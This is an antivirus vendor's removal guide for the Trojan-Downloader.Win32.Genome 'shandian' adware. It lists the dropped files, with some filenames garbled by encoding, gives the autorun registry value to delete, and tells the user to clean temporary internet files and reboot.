%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\stat[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\xID.dll (10 bytes)
%Program Files%\shandian\bin\shandian.exe (28283 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\config0.ini (3 bytes)
%Program Files%\shandian\ico\ie.ico (700 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Desktop\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·.lnk (505 bytes)
%Program Files%\shandian\config.ini (194 bytes)
%Program Files%\shandian\bin\shandian.ini (74 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\config.ini (4 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·.lnk (700 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\Md5dll.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Program Files%\shandian\ico\anquan.ico (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Program Files%\shandian\ico\taobao.ico (15 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·.lnk (694 bytes)
%Program Files%\shandian\bin\sdad.exe (12955 bytes)
%Program Files%\shandian\shandian.exe (3124 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·\ÃƒÂÃ‚Â¶Ãƒâ€ÃƒËœÃƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·.lnk (507 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Desktop\360Ã‚Â°Ã‚Â²ÃƒË†Ã‚Â«ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
%Program Files%\shandian\bin\twcache.ini (1392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\123_sogou_com[1].txt (15406 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\welcome_cn[1].htm (1469 bytes)
%Program Files%\shandian\bin\shandian.ini.tmp (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
%Program Files%\shandian\bin\theworld.ac (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\newioage[1].css (715 bytes)
%Documents and Settings%\%current user%\Cookies\6JFOCE1Z.txt (86 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\cpv1[1].htm (1117 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\miniindex[1].htm (3605 bytes)
%Program Files%\shandian\bin\update\PopWinParam.xml (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\jquery-1.7.2.min[1].js (46418 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\cpc_img[1].htm (442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\tj[1].js (279 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\stylemini[1].css (4241 bytes)

Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"shandian" = "%Program Files%\shandian\shandian.exe"

Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Did you found this article useful:
No votes yet

Permalink

Back to the blog

e-mail

Linkedin

Google+

Twitter

Facebook

E-mail

Recipient's email address:

Your Name:

Your email address:

Trojan-Downloader.Win32.Genome.gxgz_d617df9b1a

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet